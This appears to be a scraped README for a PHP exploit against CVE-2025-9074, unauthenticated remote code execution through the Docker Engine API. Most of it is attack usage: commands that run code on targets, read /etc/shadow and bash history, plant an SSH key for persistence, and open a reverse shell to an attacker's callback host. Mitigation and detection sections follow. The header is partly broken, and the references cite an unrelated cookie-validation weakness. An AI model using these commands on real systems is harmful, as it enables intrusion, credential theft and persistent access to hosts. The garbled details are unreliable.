Share
## https://sploitus.com/exploit?id=E581ECBE-1CD2-55F7-8F05-3CC6DFD5264A
# CVE-2025-9074: Docker Engine API Unauthenticated RCE

> **Severity**: CRITICAL | **CVSS Score**: 9.8 (estimated) | **Affected Versions**: Docker Desktop  [options]
```

### Options

| Option | Short | Required | Description |
|--------|-------|----------|-------------|
| `--url` | `-u` | โœ… Yes | Docker API URL (e.g., `http://1.2.3.4:2375`) |
| `--mode` | `-m` | โŒ No | Execution mode: `cmd` or `reverse` (default: `cmd`) |
| `--cmd` | `-c` | โš ๏ธ For cmd mode | Command to execute on target |
| `--lhost` | `-l` | โš ๏ธ For reverse mode | Your IP address for callback |
| `--lport` | `-p` | โŒ No | Your listening port (default: 4444) |
| `--os` | โ€” | โŒ No | Target OS: `linux`, `mac`, `windows` (default: `linux`) |
| `--cleanup` | โ€” | โŒ No | Remove container after execution |
| `--help` | `-h` | โŒ No | Display help message |

### Mode: Command Execution

Execute single commands on the target:

```bash
# Simple command
php poc.php -u http://192.168.65.7:2375 -m cmd -c "id"

# Read files from host
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/flag.txt" --cleanup

# With cleanup
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami" --cleanup
```

### Mode: Reverse Shell

Spawn an interactive shell with callback:

```bash
php poc.php -u http://192.168.65.7:2375 -m reverse -l 192.168.1.100 -p 4444
```

### OS-Specific Examples

#### Linux Target
```bash
php poc.php -u http://target:2375 -m cmd -c "cat /mnt/hostfs/etc/shadow" --os linux
```

#### Windows Target
```bash
php poc.php -u http://target:2375 -m cmd -c "dir C:\" --os windows
```

#### macOS Target
```bash
php poc.php -u http://target:2375 -m cmd -c "ls -la /mnt/hostfs/Users/" --os mac
```

## ๐ŸŽฏ Real-World Exploitation Scenarios

### 1. Reconnaissance
```bash
# Enumerate host system
php poc.php -u http://192.168.65.7:2375 -m cmd -c "uname -a"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "whoami"
```

### 2. Credential Harvesting
```bash
# Extract sensitive files
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/root/.bash_history"
php poc.php -u http://192.168.65.7:2375 -m cmd -c "cat /mnt/hostfs/etc/passwd"
```

### 3. Persistence
```bash
# Add SSH key
php poc.php -u http://192.168.65.7:2375 -m cmd -c "mkdir -p /mnt/hostfs/root/.ssh && echo 'SSH_KEY' >> /mnt/hostfs/root/.ssh/authorized_keys"
```

### 4. Lateral Movement
```bash
# Enumerate running containers and networks
php poc.php -u http://192.168.65.7:2375 -m cmd -c "docker ps --all"
```

## ๐Ÿ” Technical Details

### Vulnerability Mechanism

1. **Exposed Docker Socket/API**: Docker API listens on `0.0.0.0:2375` without authentication
2. **Privileged Container Creation**: POC creates privileged containers via `/containers/create`
3. **Host Filesystem Binding**: Containers use bind mounts to access host filesystem:
   - **Linux**: `/:/mnt/hostfs`
   - **macOS**: `/:/mnt/hostfs`
   - **Windows**: `/mnt/host/c:/mnt/hostfs`
4. **Command Execution**: Commands execute with root/SYSTEM privileges inside the container
5. **Host Filesystem Access**: Direct read/write access to `/mnt/hostfs` paths

### Payload Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ poc.php (Your Machine)                               โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
             โ”‚ HTTP REST API Call
             โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Docker API (Target Port 2375) [UNAUTHENTICATED]     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
             โ”‚ Creates Container
             โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Privileged Alpine Container                          โ”‚
โ”‚ โ”œโ”€ Full Root Access                                 โ”‚
โ”‚ โ”œโ”€ Bind Mount: /:/mnt/hostfs                       โ”‚
โ”‚ โ””โ”€ Executes Attacker Command                        โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
             โ”‚ Command Output
             โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚ Output Returned to Attacker                          โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

### Code Analysis

- **Docker API Interaction**: Uses cURL for HTTP/1.1 REST API communication
- **Docker Log Demuxing**: Properly handles Docker's multiplexed stream format
- **Cross-Platform Support**: Adapts bind mount paths for Windows/Mac/Linux
- **Timeout Handling**: 60-second timeout for long-running commands

## ๐Ÿ›ก๏ธ Mitigation

### Immediate Actions

1. **Upgrade Docker Desktop**
   ```bash
   # Update to version 4.44.3 or later
   ```

2. **Network Isolation**
   - Restrict Docker API port (2375) to localhost only
   - Use firewall rules to block external access
   - Disable Docker API socket exposure

3. **Enable TLS Authentication**
   ```bash
   # Configure Docker daemon with TLS certificates
   # In daemon.json:
   {
     "tlsverify": true,
     "tlscacert": "/etc/docker/ca.pem",
     "tlscert": "/etc/docker/server-cert.pem",
     "tlskey": "/etc/docker/server-key.pem"
   }
   ```

4. **Network Segmentation**
   - Run Docker Desktop on isolated networks
   - Implement zero-trust network access
   - Use VPNs for remote access

### Docker Desktop Settings

- **Windows/Mac**: Disable "Expose daemon on tcp://localhost:2375"
- Use Unix socket (`/var/run/docker.sock`) for local access only
- Implement authentication via Docker Context with credentials

## ๐Ÿ“Š Detection

### Network Detection

```bash
# Scan for exposed Docker APIs
nmap -p 2375,2376 -sV target_network

# Check if port responds to Docker API
curl -s http://target:2375/version
```

### Log Detection

- Monitor Docker daemon logs for unusual API calls
- Alert on privileged container creation
- Track bind mount usage patterns

## โš ๏ธ Disclaimer

**This tool is provided for authorized security testing and educational purposes only.**

- Only use this POC on systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- Users assume full responsibility for their actions
- This POC is for authorized penetration testing and vulnerability research

## ๐Ÿ“ References

- [Docker Engine Security](https://docs.docker.com/engine/security/)
- [Docker API Documentation](https://docs.docker.com/engine/api/)
- [CVE-2025-9074 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-9074)
- [CWE-784: Reliance on Cookies without Proper Validation](https://cwe.mitre.org/data/definitions/784.html)

## ๐Ÿค Contributing

Contributions are welcome! Please feel free to submit issues or pull requests.

## ๐Ÿ“„ License

This project is licensed under the MIT License - see the LICENSE file for details.

## ๐Ÿ‘ค Author

Security Researcher | Penetration Tester

---

**Last Updated**: May 2025 | **Status**: Active Research